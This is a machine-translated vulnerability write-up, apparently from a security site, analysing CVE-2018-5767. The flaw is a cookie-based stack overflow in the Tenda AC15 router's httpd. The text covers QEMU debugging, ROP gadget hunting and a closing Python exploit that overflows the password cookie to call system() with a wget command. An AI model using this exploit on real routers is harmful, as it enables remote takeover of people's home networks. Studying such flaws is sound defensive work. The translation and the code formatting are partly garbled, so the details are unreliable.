Router vulnerability analysis the fifth bomb: CVE-2018-5767 router remote code execution-vulnerability warning-the black bar safety net

1. Vulnerability overview
   CVE-2018-5767 TENDA AC15 router right remote code execution
   Reference information: https://www.fidusinfosec.com/remote-code-execution-cve-2018-5767/
   Vulnerability firmware version:
   Tenda cn Ac15_firmware:15.03.1.16
2. The vulnerability analysis.
   Vulnerabilities file is bin/httpd
   Here will be the cookie of the password followed by the value copied to variable var_1c0, resulting in stack overflow
   ! [](/Article/UploadPic/2018-4/2018424183144648. png? www. myhack58. com)
   The Arm the small end of the structure.
   ! [](/Article/UploadPic/2018-4/2018424183144798. png? www. myhack58. com)
   The first arm architecture to qemu copied over.
   cp $(which qemu-arm-static) ./ qemu
   Use the following script to debug:
   #!/ bin/bash
   PORT=“1234”
   chroot …/qemu-g $PORT ./ bin/httpd
   Here will need to be connectcfm the return value of the patch of 1:
   ! [](/Article/UploadPic/2018-4/2018424183144655. png? www. myhack58. com)
   Recommend keypatch Plug-In, can be in IDA directly modify the instruction, https://github.com/keystone-engine/keypatch
   ! [](/Article/UploadPic/2018-4/2018424183144167. png? www. myhack58. com)
   After the http service can be up and running:
   ! [](/Article/UploadPic/2018-4/2018424183144422. png? www. myhack58. com)
   In R7WebsSecurityHandler the next good breakpoint,
   Exploit. py run, broken down:
   ! [](/Article/UploadPic/2018-4/2018424183145863. png? www. myhack58. com)
   LR to store the return value, the address of FECDC, the var_1c0 is to be stored controllable input variables where FEB1C, so our palyload for A in FECDC-FEB1C）+BBBB(need to overwrite the return address)+ccccdddd it. Ran a wave, found no break to the pc=42424242 place, but[R3] error.
   ! [](/Article/UploadPic/2018-4/2018424183145906. png? www. myhack58. com)
   In the copy of the complete password, but also will see the string if it contains”.” And”.” After the third bit is”gif”,if anything it will directly jump to the end, and not going to need to read[R3]place, 在payload里面加上.gif, pc to 42424242 at the crash.
   ! [](/Article/UploadPic/2018-4/2018424183145324. png? www. myhack58. com)
   With nx, the stack of the code cannot be executed directly, and therefore must be ROP.
   ! [](/Article/UploadPic/2018-4/2018424183145952. png? www. myhack58. com)
   Find the libc base address: the
   ! [](/Article/UploadPic/2018-4/2018424183145215. png? www. myhack58. com)
   Libc=0x409c7000
   But here there is a pit,the libc address is not correct,the rop chain will jump to the wrong place,
   Look puts the address of the function:
   ! [](/Article/UploadPic/2018-4/2018424183146285. png? www. myhack58. com)
   Puts in libc address:
   ! [](/Article/UploadPic/2018-4/2018424183146806. png? www. myhack58. com)
   Then libc=409dccd4-35cd4=409A7000
   Libc has system function,then you need to find a pop r0,sp is similar to the Code of the sp in the parameter into r0 to
   ROPgadget–binary=./ lib/libc. so. 0 | grep”mov r0, sp”
   Or –the only “pop”| grep“r0”,but pop {r0 pc} this command cannot be used,because the r0 parameter is too long,so need to put the pc Back, find the following two godget:
   ! [](/Article/UploadPic/2018-4/2018424183146968. png? www. myhack58. com)
   ! [](/Article/UploadPic/2018-4/2018424183146145. png? www. myhack58. com)
   The first system pop into r3, then the sp in the command parameter into r0,
   构造如下exploit.py to:
   url = “http://%s:80/goform/exeCommand”%(host) libc=0x409a7000godget1=0x00018298 #pop r3 pcgodget1 = struct. pack(“,godget1+libc)system=0x0005A270system = struct. pack(”, system+libc)command=“wget192. 168. 174. 136"godget2 = 0x00040cb8 # mov r0, sp; blx r3godget2 = struct. pack(”, godget2 + libc)password = “A” * 444+“. gif”+godget1+system+godget2+commandreq = urllib2. Request(url)req. add_header(“Cookie”, “password=%s” % password)try: resp = urllib2. urlopen(req)except: pass

[1] [2] next